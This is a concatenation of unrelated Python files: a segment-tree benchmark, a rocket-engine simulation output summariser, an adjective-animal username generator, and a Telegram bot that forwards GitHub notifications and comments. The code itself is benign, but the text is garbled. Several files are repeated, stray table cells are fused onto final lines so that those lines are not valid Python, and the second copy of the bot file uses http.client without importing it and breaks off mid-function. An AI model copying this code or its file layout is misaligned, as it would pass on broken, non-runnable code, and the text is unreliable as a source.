def bench_query(tree_cls: Type, size: int = 100_000, queries: int = 10000):
    """Time *queries* tree.query calls against a prebuilt tree.

    Returns the list of per-repeat wall-clock times from timeit.repeat.
    """
    print(f"\n{tree_cls.__name__}: query")
    print(f"Tree size: {size}, queries count: {queries}")
    random.seed(42)  # Reproducibility: same data for every implementation.
    container = [random.randint(-100, 100) for _ in range(size)]
    tree = tree_cls(container)
    # Pre-generate queries so RNG cost is excluded from the timed loop.
    prepared_queries = [get_random_query(0, size - 1) for _ in range(queries)]
    # timeit evaluates the statement by name, so expose our locals to it.
    context = {**globals(), **locals()}
    return timeit.repeat(
        "for query in prepared_queries: tree.query(*query)",
        globals=context,
        number=1,
        repeat=5,
    )
def bench_update(tree_cls: Type, size: int = 100_000, queries: int = 10000):
    """Time *queries* tree.update calls against a prebuilt tree.

    Returns the list of per-repeat wall-clock times from timeit.repeat.
    """
    print(f"\n{tree_cls.__name__}: update")
    print(f"Tree size: {size}, queries count: {queries}")
    random.seed(42)  # Reproducibility: same data for every implementation.
    container = [random.randint(-100, 100) for _ in range(size)]
    tree = tree_cls(container)
    # Each update is (index, new value), generated up front so RNG cost is
    # excluded from the timed loop.
    prepared_queries = [
        [random.randint(0, size - 1), random.randint(-100, 100)] for _ in range(queries)
    ]
    # timeit evaluates the statement by name, so expose our locals to it.
    context = {**globals(), **locals()}
    return timeit.repeat(
        "for query in prepared_queries: tree.update(*query)",
        globals=context,
        number=1,
        repeat=5,
    )
# Segment-tree implementations benchmarked against one another.
IMPLEMENTATIONS = [
    pysegmenttree._pysegmenttree_py.PySegmentTree,
    pysegmenttree.c_extensions.IntSegmentTree,
    pysegmenttree.c_extensions.FloatSegmentTree,
]
# Benchmark name -> benchmark function.
BENCHES = {
    "build": bench_build,
    "query": bench_query,
    # Bug fix: "update" previously mapped to bench_query, so the update
    # benchmark was never actually run.
    "update": bench_update,
}
if __name__ == "__main__":
    # First row is the header: one column per implementation.
    results_table = [["-", *(impl.__name__ for impl in IMPLEMENTATIONS)]]
    for bench, func in BENCHES.items():
        results_table.append([bench])
        for tree_cls in IMPLEMENTATIONS:
            timeit_results = func(tree_cls)
            # Report the mean of the timeit repeats per implementation.
            mean = statistics.mean(timeit_results)
            results_table[-1].append(mean)
    # NOTE(review): trailing "| 0.668447 | 0.284116" below is a
    # dataset-extraction artifact fused onto the final line.
    print(tabulate.tabulate(results_table, headers="firstrow", tablefmt="grid")) | 0.668447 | 0.284116
import numpy as np
import json
import scipy.signal
import matplotlib
import matplotlib.pyplot as plt
from helpers.misc import loadmat, Struct
def _round_design_value(val):
    """Round one summary scalar: 4 decimal places for values above 0.1,
    otherwise 5 significant figures. Exact zeros are returned unchanged —
    the original expression took log10(abs(0)), which blows up."""
    if val > 0.1:
        return np.round(val, 4)
    if val == 0:
        return val
    return round(val, 5 - int(np.floor(np.log10(abs(val)))) - 1)


def compile_outputs(data: dict, output_file_path: str) -> tuple:
    """Summarize a PropSim .mat output file into a JSON design summary.

    Args:
        data: Design-input dict (propellant densities, dry mass, injector
              areas, ambient temperature, ...).
        output_file_path: Path to the PropSimOutput .mat file; the summary
                          JSON is written into the same directory.

    Returns:
        (design, json_path): the summary dict and the path of the
        "FinalDesignSummary.json" file that was written.
    """
    g_0 = 9.80665  # [m/s^2] Gravitational acceleration constant
    design = dict()
    record = loadmat(output_file_path)["record"]  # Custom loadmat to solve bad formatting
    max_thrust, m_dot_max, p_cc_max = get_max_thrust(record)
    impulse = record["impulse"]
    isp = record["Isp"]/g_0
    # Mass of propellants
    Mox_initial = record["m_ox"].flatten()[0]
    Mox = record["m_ox"].flatten()[0] - record["m_ox"].flatten()[-1]
    Vox = (Mox/data["rho_o"])*1e03  # [L]
    Mfuel_initial = record["m_fuel"].flatten()[0]
    Mfuel = record["m_fuel"].flatten()[0] - record["m_fuel"].flatten()[-1]
    Vfuel = (Mfuel/data["rho_f"])*1e03  # [L]
    of_ratio = Mox/Mfuel
    avg_mdot_ox = np.mean(record["m_dot_ox"].flatten()[1:])  # First element is None
    avg_mdot_fuel = np.mean(record["m_dot_fuel"].flatten()[1:])  # First element is None
    # Propellant tank parameters
    start_p_oxtank = record["p_oxtank"].flatten()[0]
    end_p_oxtank = record["p_oxtank"].flatten()[-1]
    start_p_fueltank = record["p_fueltank"].flatten()[0]
    end_p_fueltank = record["p_fueltank"].flatten()[-1]
    # Other parameters
    exit_mach = get_filtered_max(record, record["M_e"].flatten())
    local_c = np.sqrt(1.4*287.058*data["T_amb"])  # Local speed of sound, 1.4 gamma, 287.058 J/kg*K
    burn_time = record["time"].flatten()[-1]
    wet_mass = data["mass_dry_rocket"] + Mfuel_initial + Mox_initial
    dry_mass = data["mass_dry_rocket"] + (Mfuel_initial-Mfuel) + (Mox_initial-Mox)
    delta_v = isp*g_0*np.log(wet_mass/dry_mass)
    # delta_v = exit_mach*local_c*np.log(wet_mass/dry_mass)
    ideal_alt = 0.5*(delta_v**2)/g_0  # Simply using delta_K = delta_U; no air resistance
    # Add vital data to output dictionary
    # TODO: ADD MORE CRITICAL VALUES HERE; add values from data_dict to here
    design["max_thrust"] = max_thrust
    design["m_dot_max"] = m_dot_max
    design["p_cc_max"] = p_cc_max
    design["impulse"] = impulse
    design["isp"] = isp
    design["Mprop_used"] = Mox + Mfuel
    design["Mox_initial"] = Mox_initial
    design["Mox_used"] = Mox
    design["Vox_used"] = Vox
    design["Mfuel_initial"] = Mfuel_initial
    design["Mfuel_used"] = Mfuel
    design["Vfuel_used"] = Vfuel
    design["of_ratio"] = of_ratio
    design["avg_mdot_ox"] = avg_mdot_ox
    design["avg_mdot_fuel"] = avg_mdot_fuel
    design["start_p_oxtank"] = start_p_oxtank
    design["end_p_oxtank"] = end_p_oxtank
    design["start_p_fueltank"] = start_p_fueltank
    design["end_p_fueltank"] = end_p_fueltank
    design["A_inj_ox_eff"] = data["ox"]["injector_area"]  # Only the injector area (orifice sizes)
    design["A_inj_fuel_eff"] = data["fuel"]["injector_area"]
    design["A_inj_o_only"] = data["ox"]["A_inj_o_only"]  # Effective injector area (including Cv)
    design["A_inj_f_only"] = data["ox"]["A_inj_f_only"]
    design["exit_mach"] = exit_mach
    design["burn_time"] = burn_time
    design["ideal_delta_v"] = delta_v
    design["ideal_alt"] = ideal_alt
    # Cut off extraneous significant figures (zero-safe; see helper above).
    for key, val in design.items():
        design[key] = _round_design_value(val)
    # Export to JSON file
    json_obj = json.dumps(design, indent=4, separators=(",", ": "))
    prefix = output_file_path[:output_file_path.rfind("/")]
    json_path = prefix + "/FinalDesignSummary.json"
    with open(json_path, "w+") as f:
        f.write(json_obj)
    return design, json_path
def get_max_thrust(record: dict) -> tuple:
    """Filters out local spikes and finds max thrust, mdot, and chamber pressure."""
    # Moving-average window spanning ~0.1 s worth of samples.
    window_seconds = 0.1
    sample_dt = np.mean(np.diff(record["time"]))
    window_len = int(np.ceil(window_seconds / sample_dt))
    denominator = np.array([1])
    numerator = np.full(window_len, 1.0 / window_len)
    smooth_thrust = scipy.signal.lfilter(numerator, denominator, record["F_thrust"])
    smooth_m_dot = scipy.signal.lfilter(numerator, denominator, record["m_dot_prop"])
    smooth_p_cc = scipy.signal.lfilter(numerator, denominator, record["p_cc"])
    # Report mdot and chamber pressure at the instant of peak smoothed thrust.
    peak = np.argmax(smooth_thrust)
    return smooth_thrust[peak], smooth_m_dot[peak], smooth_p_cc[peak]
def get_filtered_max(record: dict, vals: list or np.ndarray) -> float:
    """Smooth *vals* with a ~0.1 s moving average and return the peak value."""
    window_seconds = 0.1
    sample_dt = np.mean(np.diff(record["time"]))
    window_len = int(np.ceil(window_seconds / sample_dt))
    numerator = np.full(window_len, 1.0 / window_len)
    smoothed = scipy.signal.lfilter(numerator, np.array([1]), vals)
    return smoothed[np.argmax(smoothed)]
if __name__ == "__main__":
    # Smoke-run against a saved test case. NOTE(review): an empty data dict
    # means compile_outputs will KeyError on its first data[...] lookup.
    # The trailing "| helpers/output.py |" below is a dataset-extraction
    # artifact fused onto the final line, not code.
    compile_outputs(dict(), "./case-files/test_case_2/PropSimOutput.mat") | helpers/output.py |
import numpy as np
import json
import scipy.signal
import matplotlib
import matplotlib.pyplot as plt
from helpers.misc import loadmat, Struct
def _round_design_value(val):
    """Round one summary scalar: 4 decimal places for values above 0.1,
    otherwise 5 significant figures. Exact zeros are returned unchanged —
    the original expression took log10(abs(0)), which blows up."""
    if val > 0.1:
        return np.round(val, 4)
    if val == 0:
        return val
    return round(val, 5 - int(np.floor(np.log10(abs(val)))) - 1)


def compile_outputs(data: dict, output_file_path: str) -> tuple:
    """Summarize a PropSim .mat output file into a JSON design summary.

    Args:
        data: Design-input dict (propellant densities, dry mass, injector
              areas, ambient temperature, ...).
        output_file_path: Path to the PropSimOutput .mat file; the summary
                          JSON is written into the same directory.

    Returns:
        (design, json_path): the summary dict and the path of the
        "FinalDesignSummary.json" file that was written.
    """
    g_0 = 9.80665  # [m/s^2] Gravitational acceleration constant
    design = dict()
    record = loadmat(output_file_path)["record"]  # Custom loadmat to solve bad formatting
    max_thrust, m_dot_max, p_cc_max = get_max_thrust(record)
    impulse = record["impulse"]
    isp = record["Isp"]/g_0
    # Mass of propellants
    Mox_initial = record["m_ox"].flatten()[0]
    Mox = record["m_ox"].flatten()[0] - record["m_ox"].flatten()[-1]
    Vox = (Mox/data["rho_o"])*1e03  # [L]
    Mfuel_initial = record["m_fuel"].flatten()[0]
    Mfuel = record["m_fuel"].flatten()[0] - record["m_fuel"].flatten()[-1]
    Vfuel = (Mfuel/data["rho_f"])*1e03  # [L]
    of_ratio = Mox/Mfuel
    avg_mdot_ox = np.mean(record["m_dot_ox"].flatten()[1:])  # First element is None
    avg_mdot_fuel = np.mean(record["m_dot_fuel"].flatten()[1:])  # First element is None
    # Propellant tank parameters
    start_p_oxtank = record["p_oxtank"].flatten()[0]
    end_p_oxtank = record["p_oxtank"].flatten()[-1]
    start_p_fueltank = record["p_fueltank"].flatten()[0]
    end_p_fueltank = record["p_fueltank"].flatten()[-1]
    # Other parameters
    exit_mach = get_filtered_max(record, record["M_e"].flatten())
    local_c = np.sqrt(1.4*287.058*data["T_amb"])  # Local speed of sound, 1.4 gamma, 287.058 J/kg*K
    burn_time = record["time"].flatten()[-1]
    wet_mass = data["mass_dry_rocket"] + Mfuel_initial + Mox_initial
    dry_mass = data["mass_dry_rocket"] + (Mfuel_initial-Mfuel) + (Mox_initial-Mox)
    delta_v = isp*g_0*np.log(wet_mass/dry_mass)
    # delta_v = exit_mach*local_c*np.log(wet_mass/dry_mass)
    ideal_alt = 0.5*(delta_v**2)/g_0  # Simply using delta_K = delta_U; no air resistance
    # Add vital data to output dictionary
    # TODO: ADD MORE CRITICAL VALUES HERE; add values from data_dict to here
    design["max_thrust"] = max_thrust
    design["m_dot_max"] = m_dot_max
    design["p_cc_max"] = p_cc_max
    design["impulse"] = impulse
    design["isp"] = isp
    design["Mprop_used"] = Mox + Mfuel
    design["Mox_initial"] = Mox_initial
    design["Mox_used"] = Mox
    design["Vox_used"] = Vox
    design["Mfuel_initial"] = Mfuel_initial
    design["Mfuel_used"] = Mfuel
    design["Vfuel_used"] = Vfuel
    design["of_ratio"] = of_ratio
    design["avg_mdot_ox"] = avg_mdot_ox
    design["avg_mdot_fuel"] = avg_mdot_fuel
    design["start_p_oxtank"] = start_p_oxtank
    design["end_p_oxtank"] = end_p_oxtank
    design["start_p_fueltank"] = start_p_fueltank
    design["end_p_fueltank"] = end_p_fueltank
    design["A_inj_ox_eff"] = data["ox"]["injector_area"]  # Only the injector area (orifice sizes)
    design["A_inj_fuel_eff"] = data["fuel"]["injector_area"]
    design["A_inj_o_only"] = data["ox"]["A_inj_o_only"]  # Effective injector area (including Cv)
    design["A_inj_f_only"] = data["ox"]["A_inj_f_only"]
    design["exit_mach"] = exit_mach
    design["burn_time"] = burn_time
    design["ideal_delta_v"] = delta_v
    design["ideal_alt"] = ideal_alt
    # Cut off extraneous significant figures (zero-safe; see helper above).
    for key, val in design.items():
        design[key] = _round_design_value(val)
    # Export to JSON file
    json_obj = json.dumps(design, indent=4, separators=(",", ": "))
    prefix = output_file_path[:output_file_path.rfind("/")]
    json_path = prefix + "/FinalDesignSummary.json"
    with open(json_path, "w+") as f:
        f.write(json_obj)
    return design, json_path
def get_max_thrust(record: dict) -> tuple:
    """Filters out local spikes and finds max thrust, mdot, and chamber pressure."""
    # Moving-average window spanning ~0.1 s worth of samples.
    window_seconds = 0.1
    sample_dt = np.mean(np.diff(record["time"]))
    window_len = int(np.ceil(window_seconds / sample_dt))
    denominator = np.array([1])
    numerator = np.full(window_len, 1.0 / window_len)
    smooth_thrust = scipy.signal.lfilter(numerator, denominator, record["F_thrust"])
    smooth_m_dot = scipy.signal.lfilter(numerator, denominator, record["m_dot_prop"])
    smooth_p_cc = scipy.signal.lfilter(numerator, denominator, record["p_cc"])
    # Report mdot and chamber pressure at the instant of peak smoothed thrust.
    peak = np.argmax(smooth_thrust)
    return smooth_thrust[peak], smooth_m_dot[peak], smooth_p_cc[peak]
def get_filtered_max(record: dict, vals: list or np.ndarray) -> float:
    """Smooth *vals* with a ~0.1 s moving average and return the peak value."""
    window_seconds = 0.1
    sample_dt = np.mean(np.diff(record["time"]))
    window_len = int(np.ceil(window_seconds / sample_dt))
    numerator = np.full(window_len, 1.0 / window_len)
    smoothed = scipy.signal.lfilter(numerator, np.array([1]), vals)
    return smoothed[np.argmax(smoothed)]
if __name__ == "__main__":
    # Smoke-run against a saved test case. NOTE(review): an empty data dict
    # means compile_outputs will KeyError on its first data[...] lookup.
    # The trailing "| 0.339718 | 0.277173" below is a dataset-extraction
    # artifact fused onto the final line, not code.
    compile_outputs(dict(), "./case-files/test_case_2/PropSimOutput.mat") | 0.339718 | 0.277173
import json, random, copy
'''
NOTE: You must run this script from within the amt directory. If you are importing and
calling generate_usernames as a function, make sure to run os.chdir(<path to amt directory>)
Adjectives Source:
https://github.com/dariusk/corpora/raw/master/data/humans/descriptions.json
https://raw.githubusercontent.com/dariusk/corpora/master/data/humans/moods.json
Animals Source:
https://raw.githubusercontent.com/dariusk/corpora/master/data/animals/collateral_adjectives.json
https://raw.githubusercontent.com/dariusk/corpora/master/data/animals/common.json'''
def generate_usernames(num_users):
    '''Generate a num_users-length list of random usernames built from an
    adjective plus an animal name (i.e. snobby_muskrat, orderly_spider).

    Word lists are read from JSON corpora in the current working directory,
    so the caller must chdir into the amt directory first (see module note).
    Output is deterministic (fixed seed 99).
    '''
    adjectives = set()
    with open('moods.json', 'r') as f:
        # https://raw.githubusercontent.com/dariusk/corpora/master/data/humans/moods.json
        adjectives.update(json.load(f)['moods'])
    with open('descriptions.json', 'r') as f:
        # https://github.com/dariusk/corpora/raw/master/data/humans/descriptions.json
        adjectives.update(json.load(f)['descriptions'])
    # Add inappropriate words to remove here:
    adjectives.remove('molested')
    adjectives.remove('abused')
    animals = set()
    with open('collateral_adjectives.json', 'r') as f:
        # https://raw.githubusercontent.com/dariusk/corpora/master/data/animals/collateral_adjectives.json
        animals.update([x['name'] for x in json.load(f)['animals']])
    with open('common.json', 'r') as f:
        # https://raw.githubusercontent.com/dariusk/corpora/master/data/animals/common.json
        animals.update(json.load(f)['animals'])
    animals = list(animals)        # should be len 246
    adjectives = list(adjectives)  # should be len 1018
    random.seed(99)  # Reproducibility
    random.shuffle(animals)
    random.shuffle(adjectives)
    usernames = []
    for i in range(num_users):
        # BUG FIX: the original wrap test was `if i > len(adjectives)`, which
        # let i == len(...) through (IndexError) and only handled a single
        # wrap-around. Modulo indexing is identical for i < len(list) and is
        # correct for any num_users.
        adj = adjectives[i % len(adjectives)]
        animal = animals[i % len(animals)]
        usernames.append('{}_{}'.format(adj, animal).replace(' ', '_').lower())
    return usernames
def alliterate_usernames(animals, adjectives):
    '''Generate a list of alliterated usernames, i.e. adored_antelope,
    feisty_fish, from input iterables of animals and adjectives.

    Each adjective is used at most once, so
    len(usernames) <= min(len(animals), len(adjectives)).
    Output is deterministic (fixed seed 99); inputs are not mutated.
    '''
    adjective_pool = list(adjectives)
    animal_pool = list(animals)
    random.seed(99)  # Reproducibility — shuffle order must match: animals first
    random.shuffle(animal_pool)
    random.shuffle(adjective_pool)
    # PERF: group adjectives by first letter once (preserving shuffled order)
    # instead of re-scanning the whole adjective list for every animal; the
    # first entry popped from a group is exactly what the original scan chose.
    by_letter = {}
    for adj in adjective_pool:
        by_letter.setdefault(adj[0], []).append(adj)
    usernames = []
    for animal in animal_pool:
        matches = by_letter.get(animal[0])
        if matches:
            adj = matches.pop(0)
            usernames.append('{}_{}'.format(adj, animal).replace(' ', '_').lower())
    return usernames
'''
NOTE: You must run this script from within the amt directory. If you are importing and
calling generate_usernames as a function, make sure to run os.chdir(<path to amt directory>)
Adjectives Source:
https://github.com/dariusk/corpora/raw/master/data/humans/descriptions.json
https://raw.githubusercontent.com/dariusk/corpora/master/data/humans/moods.json
Animals Source:
https://raw.githubusercontent.com/dariusk/corpora/master/data/animals/collateral_adjectives.json
https://raw.githubusercontent.com/dariusk/corpora/master/data/animals/common.json'''
def generate_usernames(num_users):
    '''Generate a num_users-length list of random usernames built from an
    adjective plus an animal name (i.e. snobby_muskrat, orderly_spider).

    Word lists are read from JSON corpora in the current working directory,
    so the caller must chdir into the amt directory first (see module note).
    Output is deterministic (fixed seed 99).
    '''
    adjectives = set()
    with open('moods.json', 'r') as f:
        # https://raw.githubusercontent.com/dariusk/corpora/master/data/humans/moods.json
        adjectives.update(json.load(f)['moods'])
    with open('descriptions.json', 'r') as f:
        # https://github.com/dariusk/corpora/raw/master/data/humans/descriptions.json
        adjectives.update(json.load(f)['descriptions'])
    # Add inappropriate words to remove here:
    adjectives.remove('molested')
    adjectives.remove('abused')
    animals = set()
    with open('collateral_adjectives.json', 'r') as f:
        # https://raw.githubusercontent.com/dariusk/corpora/master/data/animals/collateral_adjectives.json
        animals.update([x['name'] for x in json.load(f)['animals']])
    with open('common.json', 'r') as f:
        # https://raw.githubusercontent.com/dariusk/corpora/master/data/animals/common.json
        animals.update(json.load(f)['animals'])
    animals = list(animals)        # should be len 246
    adjectives = list(adjectives)  # should be len 1018
    random.seed(99)  # Reproducibility
    random.shuffle(animals)
    random.shuffle(adjectives)
    usernames = []
    for i in range(num_users):
        # BUG FIX: the original wrap test was `if i > len(adjectives)`, which
        # let i == len(...) through (IndexError) and only handled a single
        # wrap-around. Modulo indexing is identical for i < len(list) and is
        # correct for any num_users.
        adj = adjectives[i % len(adjectives)]
        animal = animals[i % len(animals)]
        usernames.append('{}_{}'.format(adj, animal).replace(' ', '_').lower())
    return usernames
def alliterate_usernames(animals, adjectives):
    '''Generate a list of alliterated usernames, i.e. adored_antelope,
    feisty_fish, from input iterables of animals and adjectives.

    Each adjective is used at most once, so
    len(usernames) <= min(len(animals), len(adjectives)).
    Output is deterministic (fixed seed 99); inputs are not mutated.
    '''
    adjective_pool = list(adjectives)
    animal_pool = list(animals)
    random.seed(99)  # Reproducibility — shuffle order must match: animals first
    random.shuffle(animal_pool)
    random.shuffle(adjective_pool)
    # PERF: group adjectives by first letter once (preserving shuffled order)
    # instead of re-scanning the whole adjective list for every animal; the
    # first entry popped from a group is exactly what the original scan chose.
    by_letter = {}
    for adj in adjective_pool:
        by_letter.setdefault(adj[0], []).append(adj)
    usernames = []
    for animal in animal_pool:
        matches = by_letter.get(animal[0])
        if matches:
            adj = matches.pop(0)
            usernames.append('{}_{}'.format(adj, animal).replace(' ', '_').lower())
    return usernames
import http.client
import logging
from telegram import Update, ParseMode, InlineKeyboardMarkup, InlineKeyboardButton, Chat
from telegram.ext import TypeHandler, CallbackContext, CommandHandler, MessageHandler, Filters
from bot import settings
from bot.const import TELEGRAM_BOT_TOKEN, DATABASE_FILE, DEBUG
from bot.github import GithubHandler
from bot.githubapi import github_api
from bot.githubupdates import GithubUpdate, GithubAuthUpdate
from bot.menu import reply_menu
from bot.persistence import Persistence
from bot.utils import decode_first_data_entity, deep_link, reply_data_link_filter
from bot.webhookupdater import WebhookUpdater
# Mirror raw HTTP wire traffic into the logs when running in debug mode.
if DEBUG:
    http.client.HTTPConnection.debuglevel = 5
# Root logger: DEBUG in development, INFO in production.
logging.basicConfig(level=logging.DEBUG if DEBUG else logging.INFO,
                    # [%(filename)s:%(lineno)d]
                    format='%(asctime)s %(levelname)-8s %(name)s - %(message)s')
def error_handler(update, context: CallbackContext):
    """Dispatcher error callback: log the failing update and its exception.

    Registered via dp.add_error_handler; handler exceptions arrive here as
    ``context.error``.
    """
    # Lazy %-style logging args: formatting only happens if the WARNING
    # record is actually emitted (idiomatic, and a __str__ failure cannot
    # break the error handler at format time).
    logging.warning('Update "%s" caused error "%s"', update, context.error)
def start_handler(update: Update, context: CallbackContext):
    """Handle /start: greet the user, or expand a deep-link payload.

    Deep-link payloads arrive as ``/start <cmd>__<arg>...``; the payload is
    rewritten into the message as a normal ``/<cmd> <args>`` command and the
    update is re-queued so the matching CommandHandler picks it up.
    """
    msg = update.effective_message
    # For deep linking
    if context.args:
        # Get the deep link argument and treat it as a command
        args = context.args[0].split('__')
        update.effective_message.text = '/' + ' '.join(args)
        # Resize the first entity so it covers exactly '/<cmd>'.
        update.effective_message.entities[0].length = len(args[0]) + 1
        context.update_queue.put(update)
        return
    msg.reply_text(f'👋 Hello, I am {context.bot.name}.\n'
                   f'I can notify you about events in your public GitHub repositories. '
                   f'You can also reply to my messages to post comments to GitHub right from Telegram. '
                   f'I am an improved version of the Telegram GitHub Bot.\n\n'
                   f'Use /settings to get started.',
                   disable_notification=True)
def help_handler(update: Update, context: CallbackContext):
    """Handle /help: reply with a numbered setup guide.

    In group chats an extra step is inserted telling the user to open a
    private chat with the bot first.
    """
    msg = update.effective_message
    private = update.effective_chat.type == Chat.PRIVATE
    steps = [
        f'First you must allow me access to the repositories in question. To do this, <a href="https://github.com/apps/telegram-githubbot-revised/installations/new">install</a> my <a href="https://github.com/apps/telegram-githubbot-revised">GitHub App</a> on your account or organisation, and make sure that it has access to the desired repositories.',
        f'Use the command /settings to open my settings interface and press the login button. This way I will know who you are.',
        f'Add me ({context.bot.name}) to the chat/group in which you would like to receive notifications.',
        f'In that chat use /settings to add the repositories you would like to receive notifications for.'
    ]
    if not private:
        steps.insert(1, f'Go to a private chat with me, by clicking here: {context.bot.name}.')
    # Prefix each step with a keycap-number emoji (1️⃣, 2️⃣, ...).
    text = '\n\n'.join(f'{i + 1}️⃣ {step}' for i, step in enumerate(steps))
    msg.reply_text(f'<b>Github notification guide.</b>\n\n{text}\n\n'
                   f'Note that GitHub Help has more in depth guides on how to install GitHub Apps <a href="https://help.github.com/articles/installing-an-app-in-your-personal-account/#installing-a-github-app-in-your-personal-account">in your personal account</a> or <a href="https://help.github.com/articles/installing-an-app-in-your-organization/#installing-a-github-app-in-your-organization">in your organisation</a> if you are having trouble with step 1.',
                   reply_markup=InlineKeyboardMarkup([
                       [InlineKeyboardButton('Add me to a group',
                                             url=f'https://telegram.me/{context.bot.username}?startgroup=start')]
                   ]),
                   parse_mode=ParseMode.HTML,
                   disable_web_page_preview=True,
                   disable_notification=True)
def privacy_handler(update: Update, context: CallbackContext):
    """Handle /privacy: reply with the privacy policy and MIT license notice."""
    msg = update.effective_message
    msg.reply_text(
        f'🔏 Privacy policy for {context.bot.name}\n\n'
        f'GithubBot Revised is an open source bot built by <a href="https://telegram.me/jsmnbom"><NAME></a>.\n\n'
        f'GithubBot revised stores GitHub login tokens - if you logout they will be deleted from the server.\n'
        f'To prevent overloading GitHub servers, data received from GitHub is also cached according to GitHub server headers.\n\n'
        f'THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT '
        f'LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. '
        f'IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, '
        f'WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE '
        f'OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\n'
        f'The MIT-licensed source code for GithubBot revised can be found at <a href="https://github.com/jsmnbom/githubbotrevised">GitHub</a>.',
        parse_mode=ParseMode.HTML,
        disable_web_page_preview=True,
        disable_notification=True
    )
def login_handler(update: Update, context):
    """Handle /login: jump straight to the login menu of the settings UI."""
    # reply_menu renders relative to a menu stack; seed it at 'settings'.
    context.menu_stack = ['settings']
    reply_menu(update, context, settings.login_menu)
def delete_job(context: CallbackContext):
    """Job-queue callback: delete the message passed as the job's context
    (reply_handler schedules this for its self-destructing login prompt)."""
    context.job.context.delete()
def reply_handler(update: Update, context: CallbackContext):
    """Forward a Telegram reply to GitHub as a comment.

    The message being replied to carries encoded routing data in its
    entities (decode_first_data_entity) identifying the issue/PR/review
    thread the comment belongs to.
    """
    msg = update.effective_message
    # Leading '!' is an escape hatch: chat about a thread without posting.
    if msg.text[0] == '!':
        return
    data = decode_first_data_entity(msg.reply_to_message.entities)
    if not data:
        # Replied-to message has no encoded routing data; nothing to post.
        return
    comment_type, *data = data
    access_token = context.user_data.get('access_token')
    if not access_token:
        # Not logged in: show a deep-link login prompt and schedule its
        # deletion after 30 seconds via delete_job.
        sent_msg = msg.reply_text(f'Cannot reply to {comment_type}, since you are not logged in. '
                                  f'Press button below to go to a private chat with me and login.\n\n'
                                  f'<i>This message will self destruct in 30 sec.</i>',
                                  reply_markup=InlineKeyboardMarkup([[
                                      InlineKeyboardButton('Login', url=deep_link(context.bot, 'login'))
                                  ]]),
                                  parse_mode=ParseMode.HTML,
                                  disable_notification=True)
        context.job_queue.run_once(delete_job, 30, sent_msg)
        return
    # Prefix @author so the original poster is pinged on GitHub.
    if comment_type in ('issue', 'pull request'):
        repo, number, author = data
        text = f'@{author} {msg.text_html}'
        github_api.add_issue_comment(repo, number, text, access_token=access_token)
    elif comment_type == 'pull request review comment':
        repo, number, comment_id, author = data
        text = f'@{author} {msg.text_html}'
        github_api.add_review_comment(repo, number, comment_id, text, access_token=access_token)
if __name__ == '__main__':
    # Wire up persistence, the webhook updater, all Telegram handlers and the
    # GitHub update handlers, then start the bot. (Removed stray dataset
    # columns fused onto the final line.)
    # Not strictly needed anymore since we no longer have custom persistent data
    # But since we likely will want it in the future, we keep our custom persistence
    persistence = Persistence(DATABASE_FILE)
    # Init our very custom webhook handler
    updater = WebhookUpdater(TELEGRAM_BOT_TOKEN,
                             updater_kwargs={'use_context': True,
                                             'persistence': persistence})
    dp = updater.dispatcher
    # See persistence note above
    CallbackContext.github_data = property(lambda self: persistence.github_data)
    # Save data every five (5) min
    dp.job_queue.run_repeating(lambda *_: persistence.flush(), 5 * 60)
    # Telegram updates
    dp.add_handler(CommandHandler('start', start_handler))
    dp.add_handler(CommandHandler('help', help_handler))
    dp.add_handler(CommandHandler('privacy', privacy_handler))
    dp.add_handler(CommandHandler('login', login_handler))
    settings.add_handlers(dp)
    # For commenting on issues/PR/reviews
    dp.add_handler(MessageHandler(Filters.reply & reply_data_link_filter, reply_handler))
    # Non-telegram updates
    github_handler = GithubHandler(dp)
    dp.add_handler(TypeHandler(GithubUpdate, github_handler.handle_update))
    dp.add_handler(TypeHandler(GithubAuthUpdate, github_handler.handle_auth_update))
    dp.add_error_handler(error_handler)
    updater.start()
import logging
from telegram import Update, ParseMode, InlineKeyboardMarkup, InlineKeyboardButton, Chat
from telegram.ext import TypeHandler, CallbackContext, CommandHandler, MessageHandler, Filters
from bot import settings
from bot.const import TELEGRAM_BOT_TOKEN, DATABASE_FILE, DEBUG
from bot.github import GithubHandler
from bot.githubapi import github_api
from bot.githubupdates import GithubUpdate, GithubAuthUpdate
from bot.menu import reply_menu
from bot.persistence import Persistence
from bot.utils import decode_first_data_entity, deep_link, reply_data_link_filter
from bot.webhookupdater import WebhookUpdater
# Mirror raw HTTP wire traffic into the logs when running in debug mode.
if DEBUG:
    http.client.HTTPConnection.debuglevel = 5
# Root logger: DEBUG in development, INFO in production.
logging.basicConfig(level=logging.DEBUG if DEBUG else logging.INFO,
                    # [%(filename)s:%(lineno)d]
                    format='%(asctime)s %(levelname)-8s %(name)s - %(message)s')
def error_handler(update, context: CallbackContext):
    """Dispatcher error callback: log the failing update and its exception.

    Registered via dp.add_error_handler; handler exceptions arrive here as
    ``context.error``.
    """
    # Lazy %-style logging args: formatting only happens if the WARNING
    # record is actually emitted (idiomatic, and a __str__ failure cannot
    # break the error handler at format time).
    logging.warning('Update "%s" caused error "%s"', update, context.error)
def start_handler(update: Update, context: CallbackContext):
    """Handle /start: greet the user, or expand a deep-link payload.

    Deep-link payloads arrive as ``/start <cmd>__<arg>...``; the payload is
    rewritten into the message as a normal ``/<cmd> <args>`` command and the
    update is re-queued so the matching CommandHandler picks it up.
    """
    msg = update.effective_message
    # For deep linking
    if context.args:
        # Get the deep link argument and treat it as a command
        args = context.args[0].split('__')
        update.effective_message.text = '/' + ' '.join(args)
        # Resize the first entity so it covers exactly '/<cmd>'.
        update.effective_message.entities[0].length = len(args[0]) + 1
        context.update_queue.put(update)
        return
    msg.reply_text(f'👋 Hello, I am {context.bot.name}.\n'
                   f'I can notify you about events in your public GitHub repositories. '
                   f'You can also reply to my messages to post comments to GitHub right from Telegram. '
                   f'I am an improved version of the Telegram GitHub Bot.\n\n'
                   f'Use /settings to get started.',
                   disable_notification=True)
def help_handler(update: Update, context: CallbackContext):
    """Handle /help: reply with a numbered setup guide.

    In group chats an extra step is inserted telling the user to open a
    private chat with the bot first.
    """
    msg = update.effective_message
